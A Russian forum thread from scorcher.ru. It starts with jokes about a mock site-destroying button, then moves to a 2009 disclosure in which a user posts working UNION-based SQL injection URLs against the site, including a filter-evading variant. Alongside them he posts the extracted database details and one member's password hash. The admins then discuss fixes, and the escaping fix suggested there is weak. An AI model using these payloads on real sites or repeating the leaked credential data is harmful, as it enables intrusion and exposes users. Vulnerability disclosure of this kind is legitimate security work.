Короткий адрес страницы: fornit.ru/3381 

Notice: Undefined variable: title in /var/www/www-root/data/www/scorcher.ru/forum/printpage.php on line 321
На форум
  Автор

Об автохрокинге

(Просмотров: 19871)
fornit
Jr. Poster

Сообщений: 17
1. « Сообщение №226, от Май 20, 2003, 07:29:35 PM»

Наконец дотянулись руки доделать систему автохрюкинга
Идея запатентована
Теперь каждый желающий может грохнуть этот сайт одним из двух предлагаемых способов. Если, к примеру, мама-папа-муж-жена не желает, чтобы сынок-дочка-жена-муж лазили здесь, достаточно хрюкнуть этот сайт, и любознательное существо останется без запретного яблока
Мера своевременная, потому как самое интересное здесь еще впереди.



Светлана
Sr. Poster


Сообщений: 360

2. « Сообщение №228, от Май 20, 2003, 08:40:13 PM»

Николай
И что же это за способы? 8) И зачем хрюкать сайт, когда он еще толком-то и не раскручен?



Светлана
Sr. Poster


Сообщений: 360

3. « Сообщение №229, от Май 20, 2003, 09:06:56 PM»

Второй вопрос снимается с повестки дня. :D... Я слишком, иногда, тороплюсь с нажатием кнопки "Отправить"


Род: Мужской
nan
Имеет права полного администратора сайта - админ

Сообщений: 12275


E-Mail
4. « Сообщение №231, от Май 20, 2003, 09:57:06 PM»

Можно не бояться зайти на саму страничку автохрюкинга. Процесс пойдет только после нажатия одной из двух кнопок.


Светлана
Sr. Poster


Сообщений: 360

5. « Сообщение №233, от Май 20, 2003, 10:42:01 PM»

Перспектива процесса автохрюкинга очень заманчива А восстановлению сайт подлежит после нажатия одной из кнопок?


Род: Мужской
Namor
Имеет права полного администратора сайта - админ

Сообщений: 4

6. « Сообщение №240, от Май 22, 2003, 01:12:35 AM»

Опять меня стёрли. :'(
Администрация, я буду жаловаться!

Хрюкинг - клёвая штука. Хочу себе такую-же на сайт, и обращаюсь с официальным запросом к корпорации Fornitsoft о возможности лицензирования этой технологии.

Я сначала думал что это такой способ отстрела неугодных юзеров (типа меня). А оказывается это способ суицида для них ???

Ну, в общем, хочу патент


Род: Мужской
nan
Имеет права полного администратора сайта - админ

Сообщений: 12275


E-Mail
7. « Сообщение №246, от Май 22, 2003, 08:57:32 AM»

Я тебя не стирал!!! Ты так и торчишь от 22 марта в регистрации Roman-ом! Пароль забыл? Могу напомнить, если хочешь в письме!
Насчет использования хрюкинга у тебя на сайте – никаких возражений. А нельзя ли попросить тебя в ответ сделать статейку для этого сайта о флеше в смысле программирования и т.д.?



Ласточка (гость)
8. « Сообщение №291, от Май 24, 2003, 10:41:08 PM»

Ну. товарищ Nan! И садист же ты! ;D Это я по поводу твоей системы автохрюка - способа повышения адреналина в крови на 5 минут для всех излишне любопытствующих 8) ;D


xssql
Newbie


Сообщений: 5
9. « Сообщение №14297, от Июнь 09, 2009, 02:00:55 PM»

__br__tag_ http://www.scorcher.ru/subject_index/subject_show.php?id=-4249+UNION+SELECT+0,concat_Ws(0x0b,user(),version(),database()),2,3,4,5,6,7,8,9

scorcher0@localhost
5.0.27
scorcher


http://www.scorcher.ru/subject_index/subject_show.php?id=-4249+UNION+SELECT+0,concat_Ws(0x0b,emailAddress,passwd,realName),2,3,4,5,6,7,8,9+FROM+yabbse_members+LIMIT+0,1

coder
af2dyfoj97nAU
fornit



Вот пример ПряМоРУкОХрюКИНГА гагагага


Род: Мужской
nan
Имеет права полного администратора сайта - админ

Сообщений: 12275


E-Mail
10. « Сообщение №14298, от Июнь 09, 2009, 02:45:37 PM»

дешевая инъекция.. Нужно еще немало знать, чтобы навредить. Хотя бы именя таблиц. Ну а если кто-то сильно навредит, то в логах по его ip обращусь к провайдеру, найду голубчика о будет он сильно горевать в итоге. А сайт быстро восстановлю. Дырки всегда можно найти. Люди ходят по улице без шлемов и любой может кирпичем ударить.

А пароль шифрованный :)

Короче, каждый сам решает преступник он или нет. Воры, к примеру, в точности как хакеры, гордятся своим умением потрошить лохов. Хакер - ничем не лучше вора.

Но спасибо, исправил защиту...




xssql
Newbie


Сообщений: 5
11. « Сообщение №14300, от Июнь 09, 2009, 03:24:35 PM»

ух как срашно )) давай, юзай, айпиха есть, я даже не через проксю юзал индж ))


http://www.scorcher.ru/subject_index/subject_show.php?id=-4249/**/UNION/**/SELECT/**/0,concat_Ws(0x0b,table_name,column_name),2,3,4,5,6,7,8,9+FROM+INFORMATION_SCHEMA.COLUMNS+LIMIT+0,1

Перебирай лимитом все свои таблицы ))

хотел бы навредить, поверь уже давно это сделал бы и тем более для тебя не кинул бы чтобы ты её латал ))

"дешевая инъекция"
а какая еще есть не дешевая индж?

http://www.scorcher.ru/subject_index/subject_show.php?id=-4249/**/UnION/**/SELECT/**/0,concat_Ws(0x0b,user(),version(),database()),2,3,4,5,6,7,8,9


чел то что ты фильтр кинул тебе не поможет ))

Надо сделать следующее

if !is_numeric($_POST['id']) die('fuck off');


также когда не цифровое значение

$id=addslashes($id);
$id=htmlspecialchars($id);
mysql_query(SELECT * FROM WHERE myid='$id');

обьязательно в запросах ставь ' и слешируй удачи


Род: Мужской
nan
Имеет права полного администратора сайта - админ

Сообщений: 12275


E-Mail
12. « Сообщение №14301, от Июнь 09, 2009, 03:44:52 PM»

все, сибо еще разок :) а че ты такой агрессивный?

 




xssql
Newbie


Сообщений: 5
13. « Сообщение №14309, от Июнь 09, 2009, 06:56:38 PM»

с чего ты взял что я агрессивный )) я споконый как доска )) лан, кильни мой акк с сайта чтобы на мыло мессаги не приходили и проверь все переменные


xssql
Newbie


Сообщений: 5
14. « Сообщение №14310, от Июнь 09, 2009, 06:58:19 PM»

в этой теме ввел что надо тож есть баги, исправляй, подставляй ' там где цифры, буш баги видеть


Айк
Имеет права полного администратора сайта - админ

Сообщений: 3768
15. « Сообщение №14311, от Июнь 09, 2009, 07:15:08 PM»

Туда же

http://scorcher.ru/journal/show_news.php?id='
http://scorcher.ru/forum/index.php?board=7&action=display&threadid='&start=30

Как вариант, есть проги вроде xspider. Можно поставить копию сайта на локальную виртуальную машину и проверить с помощью сканера.

Для функции mysql_query можно написать функцию обёртки, которая бы фильтровала запросы к БД и одновременно делала лог запросов, которые вызвали ошибку. Это самый простой, хоть и самый ненадёжный способ.

Вторая вариация дубовых способов: фильтровать все GET/POST запросы на моменте первого обращения к PHP коду. Поскольку переменных, которые изменяются извне не так уж много, написать такой фильтр несложно и достаточно вставить его в одном месте, например config.php (setting.php) файле, лишь бы этот файл обязательно подключался к скриптам в самом начале.

О дырах форума можно подробнее узнать по ссылке:

securityvulns.ru

В поиске ввести: "Yabb SE SQL Injection" или "Yabb SE exploit", "Yabb SE xss"

Дабы не своровали FTP пароли, пока будешь лазить по таким сайтам, нужно установить Avira ( http://free-av.com ) и усердно молится
« Последнее редактирование: 2009-06-10 00:06:31 Синь »



Род: Мужской
oleg89
Имеет права модератора этой темыFull Poster

Сообщений: 63

16. « Сообщение №14322, от Июнь 10, 2009, 01:34:26 AM»

удивляюсь нану - успевает и машеников разоблачать и хацкеров!
и все один! помог бы кто, только обижают... он и так ради нас балбесов старается!


Айк
Имеет права полного администратора сайта - админ

Сообщений: 3768
17. « Сообщение №14329, от Июнь 10, 2009, 03:59:25 PM»

На самом деле современная версия этого движка ( YaBB SE ==> SMF ) куда более устойчива ко взлому. Такого рода проблем там нет.


Род: Мужской
nan
Имеет права полного администратора сайта - админ

Сообщений: 12275


E-Mail
18. « Сообщение №14332, от Июнь 10, 2009, 05:41:58 PM»

Спасибо всем поучаствовавшим и посочувствовавшим :)

форум написан с нуля, в нем нет ничего от Yabb кроме намеков :) только движок расширенного редактора - не мой.




xssql
Newbie


Сообщений: 5
19. « Сообщение №14333, от Июнь 10, 2009, 06:38:48 PM»

"удивляюсь нану - успевает и машеников разоблачать и хацкеров"

я думаю если бы я индж не выложил врядли бы он узнал


Род: Мужской
oleg89
Имеет права модератора этой темыFull Poster

Сообщений: 63

20. « Сообщение №14334, от Июнь 10, 2009, 07:00:11 PM»

я думаю если бы я индж не выложил врядли бы он узнал


не узнал бы, и в чем прикол?

Вообще не вижу смысла ломать этот сайт. Он даже толком не раскручен...